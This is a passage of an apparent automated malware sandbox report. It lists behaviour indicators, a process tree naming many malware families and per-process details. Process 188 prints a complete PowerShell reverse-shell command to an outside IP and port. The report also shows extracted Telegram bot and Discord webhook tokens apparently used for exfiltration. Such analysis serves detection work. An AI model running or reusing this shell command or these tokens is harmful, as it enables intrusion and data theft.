      • msedge.exe (PID: 16464)
      • chrome.exe (PID: 6308)
      • chrome.exe (PID: 13092)
      • chrome.exe (PID: 14260)
      • chrome.exe (PID: 19144)
      • chrome.exe (PID: 17852)
      • chrome.exe (PID: 6496)
      • chrome.exe (PID: 21524)
      • chrome.exe (PID: 8804)
      • chrome.exe (PID: 9168)
      • chrome.exe (PID: 9748)
      • chrome.exe (PID: 984)
      • chrome.exe (PID: 1336)
      • chrome.exe (PID: 22512)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 9652)
      • powershell.exe (PID: 12208)
      • powershell.exe (PID: 10108)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 12432)
    • The executable file from the user directory is run by the Powershell process

      • Axam.exe (PID: 12528)
      • Axam.exe (PID: 6820)
      • Axam.exe (PID: 17912)
      • Axam.exe (PID: 21768)
    • Potential access to remote process (Base64 Encoded 'OpenProcess')

      • main.exe (PID: 424)
    • Reads Microsoft Office registry keys

      • 4eTHv9F.exe (PID: 8860)
    • Found Base64 encoded access to UAC via PowerShell (YARA)

      • main.exe (PID: 424)
    • Launching a file from Task Scheduler

      • cmd.exe (PID: 10684)
      • cmd.exe (PID: 17564)
      • powershell.exe (PID: 11028)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 11884)
      • powershell.exe (PID: 12432)
      • powershell.exe (PID: 8916)
      • Helper.exe (PID: 8064)
      • powershell.exe (PID: 11064)
      • powershell.exe (PID: 11868)
      • powershell.exe (PID: 15888)
      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 10992)
      • powershell.exe (PID: 21604)
      • powershell.exe (PID: 12268)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 12208)
      • powershell.exe (PID: 12432)
    • Potential remote process memory reading (Base64 Encoded 'ReadProcessMemory')

      • main.exe (PID: 424)
    • NirSoft software is detected

      • nircmd.exe (PID: 18264)
    • Potential remote process memory writing (Base64 Encoded 'WriteProcessMemory')

      • main.exe (PID: 424)
    • Potential remote process memory interaction (Base64 Encoded 'VirtualAllocEx')

      • main.exe (PID: 424)
    • Potential dynamic function import (Base64 Encoded 'GetProcAddress')

      • main.exe (PID: 424)
    • Potential library load (Base64 Encoded 'LoadLibrary')

      • main.exe (PID: 424)
    • Manual execution by a user

      • mstsc.exe (PID: 11220)
      • powershell.exe (PID: 15888)
    • Process checks whether UAC notifications are on

      • windriver.exe (PID: 19680)
    • Reads Windows Product ID

      • powershell.exe (PID: 12432)
      • Vb5HUIU.exe (PID: 7208)
    • Drops encrypted JS script (Microsoft Script Encoder)

      • sys.exe (PID: 19428)
    • Executes as Windows Service

      • SearchIndexer.exe (PID: 8392)
    • Executable content was dropped or overwritten

      • iexplore.exe (PID: 3800)
    • Changes the display of characters in the console

      • cmd.exe (PID: 6364)
      • cmd.exe (PID: 15172)
      • cmd.exe (PID: 9460)
      • cmd.exe (PID: 3952)
    • Attempting to use instant messaging service

      • svchost.exe (PID: 2200)
    • Prints a route via ROUTE.EXE

      • ROUTE.EXE (PID: 11320)
    • Manages system restore points

      • SrTasks.exe (PID: 12604)
    • The sample compiled with japanese language support

      • sys.exe (PID: 19428)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

xor-url

(PID) Process(424) main.exe
Decrypted-URLs (1)http://www.enigmaprotector.com/

ims-api

(PID) Process(424) main.exe
Telegram-Tokens (1)6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c
Telegram-Info-Links
6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c
Get info about bothttps://api.telegram.org/bot6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c/getMe
Get incoming updateshttps://api.telegram.org/bot6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c/getUpdates
Get webhookhttps://api.telegram.org/bot6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c
End-PointsendMessage
Args
Discord-Webhook-Tokens (1)1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp
Discord-Info-Links
1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp
Get Webhook Infohttps://discord.com/api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:06:19 18:59:12+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.43
CodeSize: 178688
InitializedDataSize: 154624
UninitializedDataSize: -
EntryPoint: 0xc380
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
950
Monitored processes
802
Malicious processes
131
Suspicious processes
111

Behavior graph

Click at the process to see the details
start main.exe conhost.exe no specs #XOR-URL main.exe cmd.exe schtasks.exe no specs cmd.exe no specs taskmgr.exe my1srsz.exe no specs mshta.exe no specs mshta.exe no specs mshta.exe no specs cmd.exe no specs cmd.exe no specs mshta.exe no specs conhost.exe no specs conhost.exe no specs #LUMMA svchost.exe vb5huiu.exe cqapnzm.exe no specs mshta.exe no specs sffg7wg.exe cmd.exe no specs conhost.exe no specs swagggg.exe #AMADEY donie30.exe installs.exe xclient.exe build.exe helper.exe no specs powershell.exe no specs mshta.exe no specs mshta.exe no specs mm5njcjtexpunnp1j.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs rundll32.exe rundll32.exe lollo2.exe lollo.exe powershell.exe #PURELOGS 4ethv9f.exe worldoffice.exe worldofficee.exe powershell.exe no specs tcp_windows_amd64.exe cmd.exe no specs ledenn.exe no specs allonymouslyffpy.exe no specs wxworkmultiopen.exe no specs conhost.exe no specs mshta.exe no specs mshta.exe no specs mshta.exe no specs wxworkmultiopen.exe no specs conhost.exe no specs #KOI powershell.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs #GENERIC syspool.exe conhost.exe no specs werefult.exe msiexec.exe no specs conhost.exe no specs 123.exe runtimebroker.exe regsvr32.exe no specs f.exe no specs installer.exe msiexec.exe no specs windowsupdatelauncher.exe windowsprvse.exe no specs clien123.exe regsvr32.exe no specs #NESHTA setup.exe powershell.exe no specs ganja180.exe no specs crypted12312.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe #GENERIC ganja132.exe powershell.exe conhost.exe no specs mshta.exe no specs powershell.exe no specs powershell.exe no specs ganja90.exe #GENERIC ganja45.exe ganja85.exe rickroll.exe no specs ganja113.exe l2.exe no specs porn.exe msiexec.exe no specs %d0%a4%d0%be%d1%80%d0%bc%d0%b0%203%d0%9e%d0%a8%d0%91%d0%a0.exe #DBATLOADER lol.exe powershell.exe axam.a.exe 2.exe no specs te.exe bugsoft.exe no specs powershell.exe powershell.exe no specs powershell.exe no specs dp.exe no specs ganja46.exe anap.a.exe no specs cvwizardv2.exe #PHORPIEX kajmak.exe ganja36.exe #GENERIC ganja176.exe brontok.exe no specs ganja2.exe no specs ganja190.exe no specs ganja153.exe #NETWORM amus.exe javaw.exe no specs #AGENTTESLA jay.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs withefile.exe no specs loader.exe prolin.exe conhost.exe no specs powershell.exe powershell.exe no specs #AUROTUN crypt.exe powershell.exe no specs cmd.exe no specs powershell.exe powershell.exe esp32.exe attrib.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs klass.exe no specs ganja121.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs regsvr32.exe no specs conhost.exe no specs conhost.exe no specs regsvr32.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe powershell.exe no specs msconfig.exe klass.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs ls.exe no specs #NJRAT bloxflip%20predictor.exe klass.exe no specs winsvchost.exe ls.exe no specs regsvr32.exe no specs regsvcs.exe no specs cmd.exe no specs ls.exe no specs regsvr32.exe no specs #VIDAR msbuild.exe conhost.exe no specs outlook.exe conhost.exe no specs cryptowall.exe no specs #LUMMA msbuild.exe explorer.exe #ASYNCRAT foncar.exe test7.exe no specs test1.exe no specs conhost.exe no specs schtasks.exe no specs #NJRAT your_app.exe test1.exe no specs cfxre.exe test9.exe no specs discord.exe conhost.exe no specs baboon.exe conhost.exe no specs conhost.exe no specs svchost.exe powershell.exe no specs conhost.exe no specs werfault.exe werfault.exe #GENERIC powershell.exe conhost.exe no specs msiexec.exe no specs dumer.exe no specs powershell.exe no specs #MODILOADER adobeart.exe setup.exe no specs axam.exe powershell.exe no specs installer.exe conhost.exe no specs axam.exe attrib.exe no specs conhost.exe no specs axam.exe test4.exe no specs conhost.exe no specs test6.exe no specs vshell.exe #REMCOS remcos_a.exe conhost.exe no specs cmd.exe no specs test8.exe no specs conhost.exe no specs #AMADEY dumer.exe esp.exe conhost.exe no specs testmemtest11.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs vssvc.exe no specs wscript.exe no specs ipconfig.exe no specs slui.exe powershell.exe no specs conhost.exe no specs test.exe mofcomp.exe no specs conhost.exe no specs reg.exe no specs csc.exe chrome.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs chrome.exe no specs axam.exe cvtres.exe no specs cmd.exe no specs axam.exe conhost.exe no specs certutil.exe no specs csc.exe chrome.exe ipconfig.exe no specs reg.exe cvtres.exe no specs chrome.exe no specs conhost.exe no specs chrome.exe no specs powershell.exe no specs werfault.exe schtasks.exe no specs axam.exe conhost.exe no specs chrome.exe no specs axam.exe regsvr32.exe no specs shellexperiencehost.exe no specs axam.exe msedge.exe no specs regsvr32.exe no specs msedge.exe no specs cmd.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs reg.exe axam.exe forfiles.exe no specs conhost.exe no specs attrib.exe no specs cmd.exe no specs ipconfig.exe no specs cmd.exe no specs axam.exe conhost.exe no specs conhost.exe no specs axam.exe cmd.exe no specs conhost.exe no specs mofcomp.exe no specs timeout.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs conhost.exe no specs csc.exe powershell.exe no specs forfiles.exe no specs chrome.exe no specs schtasks.exe no specs cmd.exe no specs ipconfig.exe no specs conhost.exe no specs launcher_start.exe cvwizardv2.exe powershell.exe no specs chrome.exe no specs powershell.exe no specs cvtres.exe no specs chrome.exe no specs axam.exe conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs addmefast%20bot.exe no specs nircmd.exe no specs whisker.exe no specs conhost.exe no specs cloudy.exe #REMCOS ap.exe emmetprod.exe conhost.exe no specs conhost.exe no specs testmemtest31.exe no specs conhost.exe no specs testpte.exe no specs csc.exe conhost.exe no specs mshta.exe no specs testpte2.exe no specs conhost.exe no specs testmemtest36.exe no specs conhost.exe no specs ganja177.exe no specs ganja61.exe no specs march.exe loic.exe no specs demon.exe 4.exe bootstrappernew.exe no specs elf.exe s.exe pack_autre_ncrypt.exe no specs msedge.exe no specs bootstrappernew.exe downloader.exe no specs ultralinvitepart.exe no specs 6.exe wxworkmultiopen.exe no specs c2_payload_aes.exe ganja39.exe no specs testdumpall.exe no specs demonx64.exe axam.exe testwindow.exe no specs #QUASAR quasarat.exe sup.exe testmemtest35.exe no specs ganja66.exe no specs pst.exe no specs conhost.exe no specs ganja5.exe no specs conhost.exe no specs conhost.exe no specs catqw.exe no specs lv.exe no specs testmemtest10.exe no specs ganja154.exe no specs #GENERIC ganja128.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs axam.exe 2f33566da0b91573532102.exe no specs chrome.exe no specs testmemtest24.exe no specs THREAT release.exe 90.exe no specs powershell.exe no specs test5.exe no specs win7.exe no specs ganja3.exe no specs testmemtest38.exe no specs ganja195.exe no specs tomcat8.exe no specs ganja199.exe no specs winxclient.exe wxworkmultiopen.exe no specs conhost.exe no specs testmemtest14.exe no specs nbin22.exe no specs conhost.exe no specs THREAT sys.exe pkexu0ytxar3.exe no specs yc.exe conhost.exe no specs conhost.exe no specs pe2shc.exe no specs #REMCOS fxserver.exe bootstrappernew.exe no specs ganja54.exe no specs ganja107.exe no specs ganja165.exe no specs audiodg.exe doppelganger.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs cabal.exe https.exe mypacs.exe no specs ganja35.exe no specs ganja172.exe no specs windows.exe cryptolocker.exe #NJRAT fast%20download.exe audi.exe #REMCOS 22.exe ganja151.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs shell.exe #NANOCORE windriver.exe network.exe conhost.exe no specs chrome.exe no specs server.exe no specs bootstrappernew.exe no specs #ASYNCRAT asyncclient.exe no specs mshta.exe no specs test.exe 1.exe no specs ganja49.exe no specs #REDLINE cc.exe catee.exe no specs relogintool.exe no specs swid_reader.exe no specs brbotnet.exe no specs #ASYNCRAT aaa%20(3).exe no specs dumpaaduserprt.exe no specs mshta.exe no specs mshta.exe no specs client-built.exe no specs pack_brout_ncrypt.exe no specs volatus0.5.exe no specs 444.exe client-built.exe bootstrappernew.exe #ASYNCRAT asyncclient.exe no specs conhost.exe no specs access.exe #STEALC vtoroy.exe no specs shell.exe cmd.exe no specs #STEALC perviy.exe no specs #NJRAT server.exe #NJRAT fast%20download.exe wxworkmultiopen.exe no specs #ASYNCRAT aaa%20(3).exe conhost.exe no specs #ASYNCRAT terminal_9235.exe conhost.exe no specs conhost.exe no specs msiexec.exe no specs #FORMBOOK mstsc.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs #MODILOADER 90.exe cvtres.exe no specs #METERPRETER rundll32.exe {34184a33-0407-212e-3300-09040709e2c2}.exe timeout.exe no specs chrome.exe no specs cmd.exe no specs powershell.exe no specs chrome.exe no specs netwindowsupdate.exe no specs conhost.exe no specs conhost.exe no specs axam.exe axam.exe cmd.exe no specs axam.exe s.exe no specs axam.exe reg.exe no specs axam.exe axam.exe bot.exe svhost.exe no specs ganja99.exe no specs csc.exe conhost.exe no specs conhost.exe no specs {34184a33-0407-212e-3300-09040709e2c2}.exe no specs install.exe no specs wscript.exe no specs schtasks.exe no specs #REMCOS rea.exe no specs izlkpmmnuf.exe conhost.exe no specs cmd.exe no specs #ASYNCRAT ddosziller.exe no specs chrome.exe no specs powershell.exe no specs epic.exe #REMCOS iexplore.exe no specs schtasks.exe no specs axam.exe axam.exe wmic.exe no specs axam.exe jajajdva.exe ganja168.exe no specs cloudy.exe no specs msiexec.exe no specs #XRED server1.exe conhost.exe no specs axam.exe conhost.exe no specs cmd.exe no specs axam.exe axam.exe axam.exe cmd.exe no specs axam.exe conhost.exe no specs axam.exe cmd.exe no specs axam.exe axam.exe chrome.exe no specs powershell.exe no specs cmd.exe no specs searchindexer.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs tasklist.exe no specs ipconfig.exe no specs conhost.exe no specs launcher_start.exe powershell.exe no specs iexplore.exe conhost.exe no specs axam.exe iexplore.exe no specs conhost.exe no specs powershell.exe chrome.exe no specs wmic.exe no specs cvtres.exe no specs csc.exe conhost.exe no specs chrome.exe no specs powershell.exe no specs netsh.exe no specs sc.exe no specs conhost.exe no specs cmd.exe no specs axam.exe chrome.exe no specs wmic.exe no specs werfault.exe werfault.exe findstr.exe no specs conhost.exe no specs xcopy.exe no specs csc.exe #SNAKEKEYLOGGER regsvcs.exe vbc.exe cvtres.exe no specs powershell.exe timeout.exe no specs chcp.com no specs regedit.exe no specs powershell.exe no specs cmd.exe no specs cvtres.exe no specs textinputhost.exe no specs axam.exe no specs axam.exe no specs csc.exe csc.exe conhost.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs netsh.exe no specs csc.exe chrome.exe no specs axam.exe no specs chrome.exe no specs conhost.exe no specs conhost.exe no specs wscript.exe no specs notepad.exe no specs sc.exe no specs #FORMBOOK explorer.exe cvtres.exe no specs cvtres.exe no specs wmic.exe no specs chrome.exe no specs cvtres.exe no specs powershell.exe no specs attrib.exe no specs attrib.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs netstat.exe no specs schtasks.exe no specs csc.exe conhost.exe no specs chrome.exe no specs findstr.exe no specs certutil.exe ipconfig.exe no specs sc.exe no specs conhost.exe no specs ping.exe no specs cvtres.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs cmd.exe powershell.exe cmd.exe no specs conhost.exe no specs conhost.exe no specs chrome.exe no specs conhost.exe no specs werfault.exe ipconfig.exe no specs cmd.exe no specs find.exe no specs find.exe no specs find.exe no specs chrome.exe no specs powershell.exe no specs chrome.exe no specs conhost.exe no specs sc.exe no specs axam.exe chrome.exe no specs powershell.exe no specs powercfg.exe no specs sc.exe no specs chrome.exe no specs axam.exe conhost.exe no specs schtasks.exe no specs powercfg.exe no specs chrome.exe no specs powershell.exe no specs conhost.exe no specs chrome.exe no specs cmd.exe no specs bindsvc.exe no specs powercfg.exe no specs conhost.exe no specs wmiapsrv.exe no specs reg.exe powercfg.exe no specs #QUASAR quasarat.exe c0917a8dtcp.exe axam.exe axam.exe cmd.exe no specs csc.exe csc.exe cvtres.exe no specs forfiles.exe no specs cvtres.exe no specs cmd.exe no specs reg.exe route.exe no specs schtasks.exe no specs conhost.exe no specs axam.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs reg.exe csc.exe csc.exe netstat.exe no specs dialer.exe findstr.exe no specs cvtres.exe no specs powershell.exe no specs cmd.exe cvtres.exe no specs conhost.exe no specs conhost.exe no specs csc.exe axam.exe chcp.com no specs cvtres.exe no specs powershell.exe no specs powershell.exe no specs choice.exe no specs 8nle462sgci.exe no specs searchprotocolhost.exe no specs ipconfig.exe no specs conhost.exe no specs axam.exe csc.exe conhost.exe no specs csc.exe cmd.exe no specs conhost.exe no specs axam.exe ping.exe no specs srtasks.exe no specs conhost.exe no specs csc.exe netsh.exe no specs cvtres.exe no specs cvtres.exe no specs cvtres.exe no specs timeout.exe no specs schtasks.exe no specs updater.exe no specs csc.exe csc.exe cvtres.exe no specs cvtres.exe no specs powershell.exe no specs cmd.exe no specs forfiles.exe no specs cmd.exe no specs axam.exe #QUASAR quasarat.exe conhost.exe no specs conhost.exe no specs client.exe no specs axam.exe searchfilterhost.exe no specs schtasks.exe no specs conhost.exe no specs wscript.exe no specs powershell.exe cmd.exe no specs forfiles.exe no specs cmd.exe no specs cmd.exe no specs reg.exe schtasks.exe no specs reg.exe cmd.exe no specs forfiles.exe no specs cmd.exe no specs axam.exe reg.exe no specs #NESHTA msedge.exe conhost.exe no specs cmd.exe no specs axam.exe #MINER ksoftriqd.exe conhost.exe no specs reg.exe no specs chcp.com no specs axam.exe ping.exe no specs ipconfig.exe no specs reg.exe no specs conhost.exe no specs findstr.exe no specs werfault.exe reg.exe no specs reg.exe no specs reg.exe no specs filecoauth.exe no specs reg.exe no specs wscript.exe no specs axam.exe #QUASAR quasarat.exe reg.exe reg.exe schtasks.exe no specs cmd.exe no specs findstr.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs chcp.com no specs main.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
188"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden -Exec Bypass -Command " = New-Object System.Net.Sockets.TCPClient('37.97.253.201',4432); = .GetStream(); [byte[]] = 0..65535|%{0}; while(( = .Read(, 0, .Length)) -ne 0){; = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(,0, ); = (iex 2>&1 | Out-String ); = + 'PS ' + (pwd).Path + '> '; = ([text.encoding]::ASCII).GetBytes(); .Write(,0,.Length); .Flush()}; .Close()"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
320"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffc35e8fff8,0x7ffc35e90004,0x7ffc35e90010C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
HIGH
Description:
Google Chrome
Exit code:
4294967295
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
424"C:\Users\admin\AppData\Local\Temp\main.exe" C:\Users\admin\AppData\Local\Temp\main.exe
main.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3221225786
Modules
Images
c:\users\admin\appdata\local\temp\main.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
xor-url
(PID) Process(424) main.exe
Decrypted-URLs (1)http://www.enigmaprotector.com/
ims-api
(PID) Process(424) main.exe
Telegram-Tokens (1)6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c
Telegram-Info-Links
6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c
Get info about bothttps://api.telegram.org/bot6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c/getMe
Get incoming updateshttps://api.telegram.org/bot6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c/getUpdates
Get webhookhttps://api.telegram.org/bot6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c/getWebhookInfo
Delete webhookhttps://api.telegram.org/bot6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c/deleteWebhook
Drop incoming updateshttps://api.telegram.org/bot6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c/deleteWebhook?drop_pending_updates=true
Telegram-Requests
Token6338125361:AAEZmDXOIOBOernC2iM1ibte96hu4E8sj8c
End-PointsendMessage
Args
(PID) Process(424) main.exe
Discord-Webhook-Tokens (1)1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp
Discord-Info-Links
1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp
Get Webhook Infohttps://discord.com/api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp
536wmic os get osarchitecture C:\Windows\System32\wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
632cmd.exe /c OK.batC:\Windows\System32\cmd.exemain.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
640"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x218,0x21c,0x220,0x48,0x224,0x7ffc35e8fff8,0x7ffc35e90004,0x7ffc35e90010C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google LLC
Integrity Level:
HIGH
Description:
Google Chrome
Exit code:
0
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
984"C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exeMSBuild.exe
User:
admin
Company:
Google LLC
Integrity Level:
HIGH
Description:
Google Chrome
Exit code:
21
Version:
133.0.6943.127
Modules
Images
c:\program files\google\chrome\application\chrome.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
1100\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exemain.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1132mshta.exe creamkitchenthingswithbestfutureformegoodfor.htaC:\Windows\System32\mshta.exemain.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
